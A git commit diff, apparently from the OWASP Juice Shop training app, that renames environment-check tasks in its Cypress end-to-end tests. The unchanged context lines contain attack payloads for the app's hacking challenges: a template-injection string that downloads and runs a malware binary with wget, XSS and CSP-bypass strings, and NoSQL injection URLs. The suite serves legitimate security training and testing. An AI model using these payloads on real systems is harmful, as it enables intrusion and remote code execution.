Switch e2e tests to use a more clear wordings

Hard to understand what not disabledEnv is supposed to mean
N-Sadat · Mar 10, 2024 · 9a7fdd6 · 9a7fdd6
1 parent 1b286f3
commit 9a7fdd6
Show file tree

Hide file tree

Showing 11 changed files with 42 additions and 41 deletions.
diff --git a/cypress.config.ts b/cypress.config.ts
@@ -87,11 +87,11 @@ export default defineConfig({
           const date = new Date()
           return utils.toISO8601(date)
         },
-        disableOnContainerEnv () {
-          return utils.disableOnContainerEnv()
+        isDocker () {
+          return utils.isDocker()
         },
-        disableOnWindowsEnv () {
-          return utils.disableOnWindowsEnv()
+        isWindows () {
+          return utils.isWindows()
         }
       })
     }

diff --git a/lib/utils.ts b/lib/utils.ts
@@ -17,7 +17,8 @@ import type { Challenge } from 'data/types'
 import isHeroku from './is-heroku'
 import isDocker from './is-docker'
 import isWindows from './is-windows'
-
+export { default as isDocker } from './is-docker'
+export { default as isWindows } from './is-windows'
 // import isGitpod from 'is-gitpod') // FIXME Roll back to this when https://github.com/dword-design/is-gitpod/issues/94 is resolve
 const isGitpod = () => false
 

diff --git a/test/cypress/e2e/b2bOrder.spec.ts b/test/cypress/e2e/b2bOrder.spec.ts
@@ -1,8 +1,8 @@
 describe('/b2b/v2/order', () => {
   describe('challenge "rce"', () => {
     it('an infinite loop deserialization payload should not bring down the server', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.login({ email: 'admin', password: 'admin123' })
 
           cy.window().then(async () => {
@@ -32,8 +32,8 @@ describe('/b2b/v2/order', () => {
 
   describe('challenge "rceOccupy"', () => {
     it('should be possible to cause request timeout using a recursive regular expression payload', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.login({ email: 'admin', password: 'admin123' })
           cy.window().then(async () => {
             const response = await fetch(

diff --git a/test/cypress/e2e/complain.spec.ts b/test/cypress/e2e/complain.spec.ts
@@ -58,15 +58,15 @@ describe('/#/complain', () => {
 
   describe('challenge "xxeFileDisclosure"', () => {
     it('should be possible to retrieve file from Windows server via .xml upload with XXE attack', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.get('#complaintMessage').type('XXE File Exfiltration Windows!')
           cy.get('#file').selectFile('test/files/xxeForWindows.xml')
           cy.get('#submitButton').click()
         }
-      }).then((disableOnContainerEnv) => {
+      }).then((isDocker) => {
         it('should be possible to retrieve file from Linux server via .xml upload with XXE attack', () => {
-          if (!disableOnContainerEnv) {
+          if (!isDocker) {
             cy.get('#complaintMessage').type('XXE File Exfiltration Linux!')
             cy.get('#file').selectFile('test/files/xxeForLinux.xml')
             cy.get('#submitButton').click()
@@ -79,16 +79,16 @@ describe('/#/complain', () => {
 
   describe('challenge "xxeDos"', () => {
     it('should be possible to trigger request timeout via .xml upload with dev/random attack', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.get('#complaintMessage').type('XXE Quadratic Blowup!')
           cy.get('#file').selectFile('test/files/xxeDevRandom.xml')
           cy.get('#submitButton').click()
           cy.wait(2000) // Wait for timeout of XML parser
         }
-      }).then((disableOnContainerEnv) => {
+      }).then((isDocker) => {
         it('should be possible to trigger request timeout via .xml upload with Quadratic Blowup attack', () => {
-          if (!disableOnContainerEnv) {
+          if (!isDocker) {
             cy.get('#complaintMessage').type('XXE Quadratic Blowup!')
             cy.get('#file').selectFile('test/files/xxeQuadraticBlowup.xml')
             cy.get('#submitButton').click()
@@ -102,8 +102,8 @@ describe('/#/complain', () => {
 
   describe('challenge "arbitraryFileWrite"', () => {
     it('should be possible to upload zip file with filenames having path traversal', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.get('#complaintMessage').type('Zip Slip!')
           cy.get('#file').selectFile('test/files/arbitraryFileWrite.zip')
           cy.get('#submitButton').click()
@@ -115,8 +115,8 @@ describe('/#/complain', () => {
 
   describe('challenge "videoXssChallenge"', () => {
     it('should be possible to inject js in subtitles by uploading zip file with filenames having path traversal', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.get('#complaintMessage').type('Here we go!')
           cy.get('#file').selectFile('test/files/videoExploit.zip')
           cy.get('#submitButton').click()

diff --git a/test/cypress/e2e/contact.spec.ts b/test/cypress/e2e/contact.spec.ts
@@ -52,8 +52,8 @@ describe('/#/contact', () => {
     // Cypress alert bug
     // The challege also passes but its just that cypress freezes and is unable to perform any action
     xit('should be possible to trick the sanitization with a masked XSS attack', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.get('#comment').type(
             '<<script>Foo</script>iframe src="javascript:alert(`xss`)">'
           )

diff --git a/test/cypress/e2e/forgedJwt.spec.ts b/test/cypress/e2e/forgedJwt.spec.ts
@@ -14,8 +14,8 @@ describe('/', () => {
 
   describe('challenge "jwtForged"', () => {
     it('should accept a token HMAC-signed with public RSA key with email [email protected] in the payload ', () => {
-      cy.task('disableOnWindowsEnv').then((disableOnWindowsEnv) => {
-        if (!disableOnWindowsEnv) {
+      cy.task('isWindows').then((isWindows) => {
+        if (!isWindows) {
           cy.window().then(() => {
             localStorage.setItem(
               'token',

diff --git a/test/cypress/e2e/noSql.spec.ts b/test/cypress/e2e/noSql.spec.ts
@@ -8,8 +8,8 @@ describe('/rest/products/reviews', () => {
       cy.login({ email: 'admin', password: 'admin123' })
     })
     it('should be possible to inject a command into the get route', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.window().then(() => {
             void fetch(
               `${Cypress.config('baseUrl')}/rest/products/sleep(1000)/reviews`,
@@ -29,8 +29,8 @@ describe('/rest/products/reviews', () => {
 
   describe('challenge "NoSQL Exfiltration"', () => {
     it('should be possible to inject and get all the orders', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.window().then(async () => {
             await fetch(
               `${Cypress.config('baseUrl')}/rest/track-order/%27%20%7C%7C%20true%20%7C%7C%20%27`,

diff --git a/test/cypress/e2e/profile.spec.ts b/test/cypress/e2e/profile.spec.ts
@@ -17,8 +17,8 @@ describe('/profile', () => {
 
   describe('challenge "usernameXss"', () => {
     it('Username field should be susceptible to XSS attacks after disarming CSP via profile image URL', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.visit('/profile')
           cy.get('#url').type(
             "https://a.png; script-src 'unsafe-inline' 'self' 'unsafe-eval' https://code.getmdl.io http://ajax.googleapis.com"
@@ -48,8 +48,8 @@ describe('/profile', () => {
 
   describe('challenge "ssti"', () => {
     it('should be possible to inject arbitrary nodeJs commands in username', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.visit('/profile')
           cy.get('#username').type(
             "#{global.process.mainModule.require('child_process').exec('wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware')}",

diff --git a/test/cypress/e2e/register.spec.ts b/test/cypress/e2e/register.spec.ts
@@ -12,8 +12,8 @@ describe('/#/register', () => {
     })
 
     it('should be possible to bypass validation by directly using Rest API', async () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.window().then(async () => {
             const response = await fetch(
               `${Cypress.config('baseUrl')}/api/Users/`,

diff --git a/test/cypress/e2e/restApi.spec.ts b/test/cypress/e2e/restApi.spec.ts
@@ -7,8 +7,8 @@ describe('/api', () => {
     // Cypress alert bug
     // The challege also passes but its just that cypress freezes and is unable to perform any action
     xit('should be possible to create a new product when logged in', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.window().then(async () => {
             const response = await fetch(
               `${Cypress.config('baseUrl')}/api/Products`,
@@ -84,8 +84,8 @@ describe('/rest/saveLoginIp', () => {
     })
 
     it('should be possible to save log-in IP when logged in', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.window().then(async () => {
             const response = await fetch(
               `${Cypress.config('baseUrl')}/rest/saveLoginIp`,

diff --git a/test/cypress/e2e/trackOrder.spec.ts b/test/cypress/e2e/trackOrder.spec.ts
@@ -2,8 +2,8 @@ describe('/#/track-order', () => {
   describe('challenge "reflectedXss"', () => {
     // Cypress alert bug
     xit('Order Id should be susceptible to reflected XSS attacks', () => {
-      cy.task('disableOnContainerEnv').then((disableOnContainerEnv) => {
-        if (!disableOnContainerEnv) {
+      cy.task('isDocker').then((isDocker) => {
+        if (!isDocker) {
           cy.on('uncaught:exception', (_err, _runnable) => {
             return false
           })